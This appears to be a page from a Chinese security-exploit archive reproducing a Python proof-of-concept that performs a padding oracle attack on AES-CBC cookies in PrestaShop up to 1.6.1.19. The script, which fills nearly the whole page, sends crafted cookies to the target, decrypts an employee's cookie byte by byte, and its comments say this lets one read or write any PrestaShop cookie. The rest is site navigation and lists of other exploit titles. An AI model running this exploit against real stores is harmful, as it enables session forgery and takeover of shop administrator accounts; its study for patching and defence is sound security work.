首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
PrestaShop < 1.6.1.19 - AES CBC Privilege Escalation Exploit
来源:https://ambionics.io/blog 作者:CharlesFol 发布时间:2018-07-19  
#!/usr/bin/env python3
# PrestaShop <= 1.6.1.19 AES (Rijndael) / openssl_encrypt() Cookie Read
# Charles Fol
#
#
# This POC will reveal the content of an employee's cookie.
# By modifying it one can read/write any PrestaShop cookie.
# It is a simple padding oracle implementation.
#
   
   
import requests
import urllib.parse
import base64
   
s = requests.Session()
"""
s.proxies = {
    'http': 'localhost:8080',
    'https': 'localhost:8080',
}
#"""
   
# Login as an employee, get your cookie and paste it here along with the URL
cookie = "PrestaShop-b0ebb4f17b3e451202e5b044e29ed75d=20NxjuYuGVhSt8n0M54Av9Qkpyzl9axkK%2BGgLLCcv0MLQZhLAEV8lnq6U2Ew2n5aMUOYqkrkpqjputuLiBEqqW7pIce8cUv%2F3SEFp3tPnWfCgJgXKUsR1htOQ4KAoXyYLhoc31kVgcm39OhQh5Zg3A78HnO1On2udHwN8dTRdI86kewEFZPNtmMeBF7sAr9zezevsjK1VU4BI84EVXCYQuuhnVehoqfAa9XoZC%2FD3FEmDSuspZw2AUB0S7Py6ks6eEeCVDWieBKDsHD13UK%2FzgM%2F65m5rpU1P4BSQSHN2Qs%3D000208"
   
# Parse blocks and size
cookie_name, cookie_value = cookie.split("=")
cookie_value = urllib.parse.unquote(cookie_value)
cookie_size = cookie_value[-6:]
cookie_value = cookie_value[:-6]
cookie_value = base64.b64decode(cookie_value)
   
BLOCK_SIZE = 16
   
def test_padding(data):
    """Returns true if the padding is correct, false otherwise.
    One can easily adapt it for customer cookies using:
    index.php?controller=identity
    """
    data = base64.b64encode(data).decode()
    data = urllib.parse.quote(data)
    data = data + cookie_size
    s.cookies[cookie_name] = data
    r = s.get(URL, allow_redirects=False)
    s.cookies.clear()
    return 'AdminLogin' not in r.headers.get('Location', '')
   
def e(msg):
    print(msg)
    exit(1)
   
if not test_padding(cookie_value):
    e("Invalid cookie (1)")
elif test_padding(b"~~~~~"):
    e("Invalid cookie (2)")
   
# Perform the padding oracle attack
   
result = b''
   
for b in range(1, len(cookie_value) // BLOCK_SIZE + 1):
    obtained = []
    current_block   = cookie_value[(b    ) * BLOCK_SIZE:][:BLOCK_SIZE]
    precedent_block = cookie_value[(b - 1) * BLOCK_SIZE:][:BLOCK_SIZE]
   
    for p in range(BLOCK_SIZE):
        nb_obtained = len(obtained)
   
        for i in range(256):
            pad = nb_obtained + 1
               
            prelude = (
                b"\x00" * (BLOCK_SIZE - pad) +
                bytes([i]) +
                bytes([o ^ pad for o in obtained][::-1])
            )
            data = cookie_value + prelude + current_block
   
            if test_padding(data):
                print("Got byte #%d of block #%d: %d" % (p, b, i))
                obtained.append(i ^ pad)
                break
        else:
            e("Unable to decode position %d" % p)
   
    # Compute the contents of the plaintext block
   
    result += bytes([o ^ p for p, o in zip(precedent_block, obtained[::-1])])
    try:
        print("COOKIE: %s" % result.decode())
    except UnicodeDecodeError:
        print("COOKIE: Unable to decode, wait for next block")
  

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Yahoo! Messenger Webcam 8.1 Ac
·Apache 2.2.0 - 2.2.11 Remote e
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
·VideoScript 3.0 <= 4.0.1.50 Of
  相关文章
·Modx Revolution Remote Code Ex
·CMS Made Simple 2.2.5 Authenti
·JavaScript Core Arbitrary Code
·Microsoft dnslint.exe DNS Tool
·Linux BPF Sign Extension Local
·Google Chrome - Swiftshader Bl
·HomeMatic Zentrale CCU2 Unauth
·Google Chrome - SwiftShader Op
·Microsoft Windows Enterprise M
·Splinterware System Scheduler
·Microsoft Windows .library-ms
·Davolink DVW 3200 Router - Pas
  推荐广告
CopyRight © 2002-2019 VFocuS.Net All Rights Reserved